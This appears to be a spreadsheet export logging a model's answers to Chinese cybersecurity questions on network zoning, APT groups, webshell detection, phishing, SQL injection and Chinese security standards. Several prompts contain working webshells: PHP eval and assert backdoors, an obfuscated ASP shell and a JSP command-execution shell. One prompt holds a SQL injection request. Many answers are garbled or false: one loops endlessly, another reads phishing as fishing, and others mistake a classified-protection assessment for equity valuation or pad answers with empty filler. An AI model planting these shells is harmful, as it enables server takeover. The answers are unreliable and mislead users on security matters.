    <row r="68">
      <c r="A68" s="1" t="n">
        <v>66</v>
      </c>
      <c r="B68" t="inlineStr">
        <is>
          <t>如何划分网络区域才能更安全？</t>
        </is>
      </c>
      <c r="C68" t="inlineStr">
        <is>
          <t>分配网络区域是一个重要的网络安全措施，可以帮助避免网络攻击和数据丢失。以下是一些建议，可以帮助你更好地划分网络区域：
1. 了解您的网络环境：
	* 了解您的网络设备和服务的位置和功能。
	* 了解您的网络需求和冲突。
2. 将网络分为几个区域：
	* 根据网络设备和服务的位置和功能，将网络分为不同的区域。
	* 例如，可以将网络分为虚拟 Local Area Network（VLAN），每个VLAN可以包含几个网络设备和服务。
3. 对每个区域进行安全配置：
	* 对每个区域进行安全配置，例如，设置防火墙规则和安全策略。
	* 确保每个区域的网络设备和服务都具有相应的安全措施。
4. 实施访问控制：
	* 实施访问控制，例如，限制访问某些网络设备或服务。
	* 使用身份验证和授权机制来确保只有授权的人能够访问网络设备和服务。
5. 实施网络segments：
	* 将网络分为多个segments，每个segment可以包含几个网络设备和服务。
	* 使用虚拟路由器将每个segment连接到不同的网络段。
6. 实施虚拟化技术：
	* 使用虚拟化技术，例如，虚拟机（VM）和虚拟化硬件（VDI），可以在多个网络 segment 中分配资源。
7. 实施网络监控和管理：
	* 实施网络监控和管理系统，例如，使用监控工具来监控网络流量和活动。
	* 使用诊断工具来诊断网络问题和攻击。
8. 实施备份和恢复策略：
	* 实施备份和恢复策略，例如，使用备份软件和服务来备份数据。
	* 确保备份和恢复策略能够适应不同的网络 segment 的需求。
总之，将网络分为几个区域，对每个区域进行安全配置，实施访问控制，实施网络segments，使用虚拟化技术，实施网络监控和管理，以及实施备份和恢复策略，都是一些重要的措施，可以帮助您更好地划分网络区域，从而提高网络的安全性和可靠性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D68" t="n">
        <v>27.27874374389648</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="1" t="n">
        <v>67</v>
      </c>
      <c r="B69" t="inlineStr">
        <is>
          <t>apt组织通常会采用哪些攻击手段？</t>
        </is>
      </c>
      <c r="C69" t="inlineStr">
        <is>
          <t>Apt是一个通用的术语，指的是特定目标的敏捷、隐蔽、高级别的攻击手段。通常情况下，apt组织会采用以下几种攻击手段：
1. 后台攻击：apt组织通常会在受害者的后台（如磁盘、文件系统等）进行攻击，通过找到和修改重要文件来破坏受害者的系统或数据。
2. 远程攻击：apt组织可能会利用远程攻击方式来攻击受害者，通过远程访问受害者的系统，通过网络攻击或其他方式获得访问权限。
3. 社交 engineering：apt组织可能会利用社交工具（如社交媒体、电子邮件等）来攻击受害者，通过滥用社交工具，找到受害者的个人信息，然后使用这些信息进行攻击。
4. 软件攻击：apt组织可能会利用软件攻击方式来攻击受害者，通过找到和修改软件，以更改它们的行为，或者通过找到和删除软件来破坏受害者的系统。
5. 网络攻击：apt组织可能会利用网络攻击方式来攻击受害者，通过网络攻击，找到受害者的系统，然后进行攻击。
6. 文件攻击：apt组织可能会利用文件攻击方式来攻击受害者，通过找到和修改文件，以更改它们的内容，或者通过找到和删除文件来破坏受害者的系统。
7. 应用程序攻击：apt组织可能会利用应用程序攻击方式来攻击受害者，通过找到和修改应用程序，以更改它们的行为，或者通过找到和删除应用程序来破坏受害者的系统。
8. 系统攻击：apt组织可能会利用系统攻击方式来攻击受害者，通过找到和修改系统文件，以更改它们的行为，或者通过找到和删除系统文件来破坏受害者的系统。
需要注意的是，apt组织的攻击手段可能会变化，因此，受害者需要不断地做好防范。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D69" t="n">
        <v>22.96895551681519</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="1" t="n">
        <v>68</v>
      </c>
      <c r="B70" t="inlineStr">
        <is>
          <t>这段内容看上去危险吗？
&lt;?php @eval($_POST['caidao']);?&gt;</t>
        </is>
      </c>
      <c r="C70" t="inlineStr">
        <is>
          <t>这段内容可能会导致PHP执行敏感操作，这可能会导致安全问题。
在PHP中， eval()函数用于evaluatestring，它会将指定的字符串解析成PHP代码，并执行其中的语句。如果 eval()函数的 inputs 不是可靠的，那么它可能会导致敏感操作。
在这个例子中，我们使用了 @ 符号，将 eval() 函数的输入视为可信的。但是，这并不是一个安全的做法，因为eval()函数的输入可以是任何的字符串，包括恶意的代码。
因此，在实际应用中，你应该避免使用 eval() 函数来执行来自用户或其他外部来源的代码。相反，你可以使用其他的方式，如input validation、data encryption、Content Security Policy等，来保护你的应用程序免受攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D70" t="n">
        <v>7.841360092163086</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="1" t="n">
        <v>69</v>
      </c>
      <c r="B71" t="inlineStr">
        <is>
          <t>这段base64编码的内容看上去危险吗？
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=</t>
        </is>
      </c>
      <c r="C71" t="inlineStr">
        <is>
          <t>这个base64编码的内容是什么？
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个字符串，可以解码为一个raw字节数组。base64编码的方式是将字节数组转换为 Base64 编码的字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个raw字节数组，可以用Base64解码器解码，得到一个字符串。
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
这个base64编码的内容可以用Base64编码的</t>
        </is>
      </c>
      <c r="D71" t="n">
        <v>51.6247398853302</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="1" t="n">
        <v>70</v>
      </c>
      <c r="B72" t="inlineStr">
        <is>
          <t>这是一个钓鱼邮件吗？
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;title&gt;文档标题&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;h2&gt;
    2021 年"中秋节"假日安排如下：
  &lt;/h2&gt;
  &lt;p&gt;一、放假日期 &lt;br/&gt;
  &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;9 月 19 日至 21 日，共 3 天。&lt;br/&gt;&lt;br/&gt;
  二、XXXXXXx&lt;br/&gt;
  &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;
    三、XXXXXX&lt;br/&gt;
  &lt;br/&gt;&lt;br/&gt;
    四、XXXXX&lt;br/&gt;
    &lt;br/&gt;&lt;br/&gt;
    解压密码: XXXXXXXXX &lt;/p&gt;
    &lt;/p&gt;
  &lt;div&gt;
    &lt;hr align="left" style="margin: 0 0 10px 0; border: 0; border-bottom: 1px solid #e4e5e6; height: 0; line-height: 0; font-size: 0; padding: 20px 0 0 0; width: 50px;" /&gt;
    &lt;div style="font-size: 14px; font-family: Verdana; color: #000"&gt;
      &lt;a
        class="xm_write_card" id="in_alias" style=" white-space: normal; display: inline-block; text-decoration: none !important; font-family: -apple-system, BlinkMacSystemFont, PingFang SC, Microsoft YaHei;"
        target="_blank"
      &gt;
        &lt;table style=" white-space: normal; table-layout: fixed; padding-right: 20px;" contenteditable="false" cellpadding="0" cellspacing="0"&gt;
          &lt;tbody&gt;
            &lt;tr valign="top"&gt;
              &lt;td style="width: 40px; min-width: 40px; padding-top: 10px"&gt;
                &lt;div style=" width: 64px; height: 64px; border: 1px #fff solid; border-radius: 50%; margin: 0; vertical-align: top; box-shadow: 0 0 10px 0 rgba(127, 152, 178, 0.14);"&gt;
              &lt;/td&gt;
              &lt;td style="padding: 10px 0 8px 10px"&gt;
                &lt;div class="businessCard_name" style=" font-size: 14px; color: #33312e; line-height: 20px; padding-bottom: 2px; margin: 0; font-weight: 500;"&gt;
                  xxxxxx
                &lt;/div&gt;
                &lt;div class="businessCard_mail" style=" font-size: 12px; color: #999896; line-height: 18px; margin: 0;"&gt;
                  人事部门
                &lt;/div&gt;
              &lt;/td&gt;
            &lt;/tr&gt;
          &lt;/tbody&gt;
        &lt;/table&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="C72" t="inlineStr">
        <is>
          <t>```
这是一个钓鱼邮件，它包含了一个钓鱼链接，用于让用户跳转到钓鱼平台上进行钓鱼活动。在这个例子中，钓鱼链接是一个 href 属性的 attribute，它将在邮件中打开一个新标签页面，并将用户跳转到钓鱼平台上。
钓鱼邮件通常包含一个钓鱼链接，以及一些关于钓鱼活动的信息，例如时间、地点、规则等。邮件通常会具有一定的优先级和推荐性，以便在用户收到邮件时能够快速地了解关于钓鱼活动的信息。
需要注意的是，钓鱼邮件不是一种正式的通信方式，它通常是为了促进用户的参与和互动而发送的。因此，钓鱼邮件的內容通常比较简单和易懂，并且不会包含很多的信息或指导。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D72" t="n">
        <v>9.609286785125732</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="1" t="n">
        <v>71</v>
      </c>
      <c r="B73" t="inlineStr">
        <is>
          <t>这是一个钓鱼邮件吗？
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;body&gt;
    &lt;h1&gt;请注意:&lt;br&gt;
        &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;最近员工反映多次收到钓鱼邮件,为了安全起见,请大家尽快点击下方链接下载钓鱼防护软件
        &lt;a href="https://www.baidu.com/"&gt;192.168.100.100/edr.zip&lt;/a&gt;
    &lt;/h1&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="C73" t="inlineStr">
        <is>
          <t>这是一封钓鱼邮件，其中包含了一个链接，该链接将跳转到一个恶意的网站（baidu.com）。这是一种常见的钓鱼攻击方式，可以使用这个链接来攻击用户的安全。
这封邮件的主要目标是诱惑用户点击链接，从而安装恶意软件或提供敏感数据。为了避免这种攻击，建议用户仔细检查邮件中的链接，不要点击任何可能不安全的链接。
另外，这封邮件还包含了一些可信worth信息，例如“最近员工反映多次收到钓鱼邮件”，以便使用户更好地识别这封邮件的恶意。
总之，不要随意点击邮件中的链接，慎用安全软件，保护自己的计算设备和个人隐私。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D73" t="n">
        <v>8.742122650146484</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="1" t="n">
        <v>72</v>
      </c>
      <c r="B74" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;%&lt;!--"--&gt;
eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
Function fun(Str):
	Str = Split(Str,"%")
	For x=1 To Ubound(Str)
		fun=fun&amp;Chr(Str(x)-66)
	Next
End Function
%&gt;</t>
        </is>
      </c>
      <c r="C74" t="inlineStr">
        <is>
          <t>--%&gt;
This is a web shell, yes. It takes a string as input and then splits it into an array of characters using the "%" character as a delimiter. It then loops through each character in the array and concatenates it with the "fun" function, which is a simple shell command interpreter.
The "fun" function takes a single argument, which is the input string, and splits it into an array of characters using the same "%" character as a delimiter. It then loops through each character in the array and converts it to a shell command using the ASCII code of the character.
For example, if the input string is "hello world", the output of the script would be a series of shell commands, each one representing a character in the input string. So the output might look something like this:
`hello`
`world`
This script is a simple example of how a web shell can be used to execute shell commands on a remote server. More sophisticated web shells may have additional features, such as the ability to execute arbitrary shell commands, manage file system permissions, or even interact with a remote shell session.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D74" t="n">
        <v>5.811787366867065</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="1" t="n">
        <v>73</v>
      </c>
      <c r="B75" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;%@ page pageEncoding="utf-8"%&gt;
&lt;%@ page import="java.util.Scanner" %&gt;
&lt;HTML&gt;
&lt;title&gt;Just For Fun&lt;/title&gt;
&lt;BODY&gt;
&lt;H3&gt;Build By LandGrey&lt;/H3&gt;
&lt;FORM METHOD="POST" NAME="form" ACTION="#"&gt;
    &lt;INPUT TYPE="text" NAME="q"&gt;
    &lt;INPUT TYPE="submit" VALUE="Fly"&gt;
&lt;/FORM&gt;
&lt;%
    String op="Got Nothing";
    String query = request.getParameter("q");
    String fileSeparator = String.valueOf(java.io.File.separatorChar);
    Boolean isWin;
    if(fileSeparator.equals("\\")){
        isWin = true;
    }else{
        isWin = false;
    }
    if (query != null) {
        ProcessBuilder pb;
        if(isWin) {
            pb = new ProcessBuilder(new String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), query);
        }else{
            pb = new ProcessBuilder(new String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), query);
        }
        Process process = pb.start();
        Scanner sc = new Scanner(process.getInputStream()).useDelimiter("\\A");
        op = sc.hasNext() ? sc.next() : op;
        sc.close();
    }
%&gt;
&lt;PRE&gt;
    &lt;%= op %&gt;&gt;
&lt;/PRE&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;</t>
        </is>
      </c>
      <c r="C75" t="inlineStr">
        <is>
          <t>```
This is a simple webshell that takes a query parameter from the user and executes a command on the local machine, depending on the operating system. The query parameter is passed to the `ProcessBuilder` class to create a new process, and the output of the command is captured and displayed in the page.
Note that this is just a simple example and should not be used for any malicious or unauthorized purposes. It is important to always use the internet and computing resources responsibly and ethically.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D75" t="n">
        <v>2.7635657787323</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="1" t="n">
        <v>74</v>
      </c>
      <c r="B76" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;?php
$password = "LandGrey";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?&gt;</t>
        </is>
      </c>
      <c r="C76" t="inlineStr">
        <is>
          <t>```
This is a web shell. The code above is a backdoor created by an attacker to gain unauthorized access to a web server. The `array_udiff_assoc()` function is a PHP function that is used to search for specific values in an array, but it is used here to search for the password "LandGrey" in the `$_REQUEST` array.
If the password is found, the `assert` function is executed, which allows the attacker to gain control of the server and execute arbitrary code. The `array_udiff_assoc()` function is a powerful tool for finding specific values in an array, but it can also be used to create backdoors like this one.
It is important to note that this is just an example, and the actual code used by an attacker may be more sophisticated and difficult to detect. Regularly updating and testing your web applications, as well as using security measures such as input validation and encryption, can help prevent these types of attacks.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D76" t="n">
        <v>5.132488250732422</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="1" t="n">
        <v>75</v>
      </c>
      <c r="B77" t="inlineStr">
        <is>
          <t>这是什么类型的网络攻击，如何防范？
GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(9999,99)) HTTP/1.1
Host: 192.168.77.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://192.168.77.137/general/index.php?isIE=0&amp;modify_pwd=0
Cookie: PHPSESSID=ebpjtm5tqh5tvida5keba73fr0; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d
DNT: 1
Connection: close</t>
        </is>
      </c>
      <c r="C77" t="inlineStr">
        <is>
          <t>This is an example of a SQL injection attack, and it can be prevented by using parameterized queries and prepared statements.
Here is a breakdown of the attack:
* The attacker is using a crafted HTTP request to inject malicious SQL code into the application's database queries.
* The attacker is exploiting a vulnerability in the application's input validation and sanitation mechanisms, which are not properly validating or sanitizing user input.
* The attacker is using the `user()` function to inject a malicious `SELECT` statement that queries the database for sensitive information, such as user passwords.
* The attacker is also using the `power()` function to inject a malicious `UPDATE` statement that updates the application's database with arbitrary data.
To prevent this type of attack, the application should use parameterized queries and prepared statements, which will properly validate and sanitize user input. This will ensure that malicious SQL code is not injected into the application's database queries, and the attacker will not be able to execute arbitrary SQL code or retrieve sensitive information from the database.
Here is an example of how the application can use parameterized queries and prepared statements to prevent this type of attack:
```
$stmt = $mysqli-&gt;prepare("SELECT * FROM users WHERE user_name = ?");
$stmt-&gt;bind_param("s", $username);
$stmt-&gt;execute();
$result = $stmt-&gt;get_result();
```
In this example, the `bind_param()` method is used to bind the `$username` variable to the `user_name` column in the `users` table. This will properly validate and sanitize the `$username` variable, and prevent any malicious SQL code from being injected into the query.
Additionally, the application should validate and sanitize all user input, and use whitelisting to prevent unknown or unexpected input.
It's also important to keep in mind that this is just an example of a SQL injection attack, and there are many other types of attacks that can be prevented by using parameterized queries and prepared statements.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D77" t="n">
        <v>11.36211824417114</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="1" t="n">
        <v>76</v>
      </c>
      <c r="B78" t="inlineStr">
        <is>
          <t>什么是网络安全法</t>
        </is>
      </c>
      <c r="C78" t="inlineStr">
        <is>
          <t>规？
Network security regulations are rules and guidelines that organizations must follow to protect their computer networks and data from unauthorized access, use, disclosure, disruption, modification, or destruction. These regulations are designed to ensure the confidentiality, integrity, and availability of an organization's network and data.
Some common network security regulations include:
1. Data encryption: Encrypting data in transit and at rest to protect it from unauthorized access.
2. Firewall configuration: Configuring firewalls to allow only authorized traffic to and from the network.
3. Access control: Implementing access controls, such as usernames and passwords, to restrict access to the network and data.
4. Incident response: Developing an incident response plan to handle security incidents, such as hacking attempts or data breaches.
5. Network segmentation: Segmenting the network into smaller segments to reduce the attack surface and limit the spread of malware.
6. Secure protocols: Using secure communication protocols, such as HTTPS or SFTP, to protect data in transit.
7. Regular updates and patches: Keeping software and systems up to date with the latest security patches and updates.
8. Network monitoring: Monitoring the network for unusual activity and implementing intrusion detection and prevention systems.
9. Employee education: Educating employees on security best practices and the importance of network security.
10. Compliance: Ensuring compliance with relevant laws and regulations, such as HIPAA or PCI DSS, that govern network security in specific industries.
These regulations are important because they help organizations protect their networks and data from cyber threats, which can result in significant financial loss, reputational damage, and legal liability.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D78" t="n">
        <v>10.28771305084229</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="1" t="n">
        <v>77</v>
      </c>
      <c r="B79" t="inlineStr">
        <is>
          <t>介绍一下网络安全法</t>
        </is>
      </c>
      <c r="C79" t="inlineStr">
        <is>
          <t>例？
Introduction:
As the internet becomes an increasingly important part of our daily lives, the need for internet security has grown significantly. Internet security refers to the practices and measures taken to protect internet-based systems and networks from various types of threats, including hacking, cybercrime, and cyberterrorism. In this article, we will provide an overview of internet security laws and regulations in different countries, highlighting their similarities and differences.
 similarities and differences:
1. Data Protection Act (DPA):
The Data Protection Act (DPA) is a comprehensive law that regulates the use of personal data in the European Union (EU). The DPA sets out guidelines for organizations to ensure the protection of personal data, including data protection principles, data subject rights, and obligations for organizations handling personal data. The DPA also imposes significant fines on organizations that violate the law.
2. General Data Protection Regulation (GDPR):
The General Data Protection Regulation (GDPR) is a comprehensive law that regulates the use of personal data in the EU. The GDPR replaces the DPA and provides more comprehensive protection for individuals' personal data. The GDPR sets out guidelines for organizations to ensure the protection of personal data, including data protection principles, data subject rights, and obligations for organizations handling personal data. The GDPR also imposes significant fines on organizations that violate the law.
3. California Consumer Privacy Act (CCPA):
The California Consumer Privacy Act (CCPA) is a comprehensive law that regulates the use of personal data in California, USA. The CCPA sets out guidelines for organizations to ensure the protection of personal data, including data protection principles, data subject rights, and obligations for organizations handling personal data. The CCPA also imposes significant fines on organizations that violate the law.
4. Personal Information Protection and Electronic Documents Act (PIPEDA):
The Personal Information Protection and Electronic Documents Act (PIPEDA) is a comprehensive law that regulates the use of personal data in Canada. The PIPEDA sets out guidelines for organizations to ensure the protection of personal data, including data protection principles, data subject rights, and obligations for organizations handling personal data. The PIPEDA also imposes significant fines on organizations that violate the law.
5. Privacy Act of 1974:
The Privacy Act of 1974 is a federal law in the United States that regulates the collection, use, and disclosure of personal information by federal agencies. The Privacy Act sets out guidelines for federal agencies to ensure the protection of personal information, including data protection principles, data subject rights, and obligations for federal agencies handling personal information.
6. Children's Online Privacy Protection Act (COPPA):
The Children's Online Privacy Protection Act (COPPA) is a comprehensive law that regulates the collection, use, and disclosure of personal information from children under the age of 13 in the United States. COPPA sets out guidelines for websites and online services to ensure the protection of children's personal information, including data protection principles, data subject rights, and obligations for websites and online services handling children's personal information.
7. Health Insurance Portability and Accountability Act (HIPAA):
The Health Insurance Portability and Accountability Act (HIPAA) is a comprehensive law that regulates the use and disclosure of protected health information (PHI) in the United States. HIPAA sets out guidelines for healthcare providers, health plans, and other covered entities to ensure the protection of PHI, including data protection principles, data subject rights, and obligations for covered entities handling PHI.
8. Payment Card Industry Data Security Standard (PCI DSS):
The Payment Card Industry Data Security Standard (PCI DSS) is a comprehensive law that regulates the security of payment card information in the United States and other countries. PCI DSS sets out guidelines for organizations that handle payment card information to ensure the protection of payment card information, including data protection principles, data subject rights, and obligations for organizations handling payment card information.
9. Sarbanes-Oxley Act (SOX):
The Sarbanes-Oxley Act (SOX) is a comprehensive law that regulates the protection of financial information in the United States. SOX sets out guidelines for organizations to ensure the accuracy and reliability of financial information, including data protection principles, data subject rights, and obligations for organizations handling financial information.
10. Gramm-Leach-Bliley Act (GLBA):
The Gramm-Leach-Bliley Act (GLBA) is a comprehensive law that regulates the use and disclosure of financial information in the United States. GLBA sets out guidelines for financial institutions to ensure the protection of financial information, including data protection principles, data subject rights, and obligations for financial institutions handling financial information.
Conclusion:
Internet security laws and regulations vary across different countries and regions, but there are some similarities and differences between them. Understanding these similarities and differences is essential for organizations to ensure compliance with internet security laws and regulations. By implementing robust security measures and practices, organizations can protect their customers' personal data and maintain their trust.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D79" t="n">
        <v>31.57428932189941</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="1" t="n">
        <v>78</v>
      </c>
      <c r="B80" t="inlineStr">
        <is>
          <t>介绍一下《GB/T 28448-2019》</t>
        </is>
      </c>
      <c r="C80" t="inlineStr">
        <is>
          <t>中的针对性安全性评估方法
GB/T 28448-2019 针对性安全性评估方法是中国 Standards GB/T 28448-2019 的一部分，涵盖了针对性安全性评估的基本原则、方法和评估标准。以下是它中的一些主要内容：
1. 针对性安全性评价的基本原则：
	* 针对性安全性评估应基于实际情况进行，包括评估风险、评估威胁、评估影响和评估控制等方面。
	* 针对性安全性评估应包括针对性评估和非针对性评估。
	* 针对性安全性评估应考虑相关法律、规定和评估标准。
2. 针对性安全性评估方法：
	* 针对性安全性评估应使用可靠的评估方法和技术，包括评估风险、评估威胁、评估影响和评估控制等方面。
	* 针对性安全性评估应包括针对性评估和非针对性评估。
	* 针对性安全性评估应考虑相关法律、规定和评估标准。
3. 针对性安全性评估标准：
	* 针对性安全性评估应遵循相关标准和规定，包括GB/T 28448-2019、GB/T 28449-2019等。
	* 针对性安全性评估标准应包括评估风险、评估威胁、评估影响和评估控制等方面。
总之，GB/T 28448-2019 针对性安全性评估方法和标准提供了详细的评估方法和评估标准，帮助企业和机构进行针对性安全性评估，确保了安全性评估的可靠性和公平性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D80" t="n">
        <v>21.82578802108765</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="1" t="n">
        <v>79</v>
      </c>
      <c r="B81" t="inlineStr">
        <is>
          <t>等保测评是什么</t>
        </is>
      </c>
      <c r="C81" t="inlineStr">
        <is>
          <t>Equity-based evaluation is an assessment method that focuses on evaluating the performance of a portfolio or investment strategy based on the value of the underlying equity assets.
In equity-based evaluation, the performance of the portfolio is measured by tracking the changes in the value of the equity assets held by the portfolio over a specific period of time. This method is commonly used by investment managers and analysts to evaluate the performance of a portfolio relative to a benchmark or to compare the performance of different portfolios.
Equity-based evaluation takes into account the total return of the equity assets, including both the capital appreciation and the dividend income. The total return is usually expressed as a percentage, and it is calculated by subtracting the initial value of the portfolio from its final value and dividing the result by the initial value.
Equity-based evaluation is useful for evaluating the performance of a portfolio that holds equity assets, such as stocks or mutual funds. It is particularly useful for evaluating the performance of a portfolio that is focused on long-term growth, as it takes into account the compounding effect of the returns over time.
However, equity-based evaluation has some limitations. For example, it may not be suitable for evaluating the performance of a portfolio that holds a mix of asset classes, as it only considers the performance of the equity assets. Additionally, equity-based evaluation may not take into account the risk associated with the portfolio, as it only considers the total return without considering the volatility of the returns.
In conclusion, equity-based evaluation is an assessment method that focuses on evaluating the performance of a portfolio or investment strategy based on the value of the underlying equity assets. It is useful for evaluating the performance of a portfolio that holds equity assets, but it has some limitations that should be considered when evaluating the performance of a portfolio.</t>
        </is>
      </c>
      <c r="D81" t="n">
        <v>10.82117247581482</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="1" t="n">
        <v>80</v>
      </c>
      <c r="B82" t="inlineStr">
        <is>
          <t>什么是关机基础信息设施</t>
        </is>
      </c>
      <c r="C82">
        <f>=============================================================
关机基础信息设施是指涵盖了数据存储、数据处理和数据传输等基础设施的系统，用于管理和分析大规模数据。这些基础设施包括：
1. **数据存储**：用于存储大规模数据的系统，可以是磁盘、flash存储、云存储等。
2. **数据处理**：用于处理、分析和挖掘大规模数据的系统，可以是数据仓库、数据仓库服务器、数据挖掘工具等。
3. **数据传输**：用于将数据传输到不同的设备或系统中的系统，可以是网络设备、调制解调器、数据传输工具等。
4. **数据visualization**：用于将数据转换为可见的图表、图表和报表等，用于帮助人们更好地理解和分析数据。
5. **数据安全**：用于保护数据的安全和隐私，可以是数据加密、访问控制、数据恢复等。
6. **数据管理**：用于管理和监控数据的生命周期，包括数据创建、数据修改、数据删除等。
7. **数据可用性**：用于保证数据的可用性和可扩展性，可以是数据库、数据存储、网络设备等。
关机基础信息设施是为了解决大规模数据的存储、处理、分析和visualization等问题，帮助组织更好地管理和利用数据资源。</f>
        <v/>
      </c>
      <c r="D82" t="n">
        <v>14.3099217414856</v>
      </c>
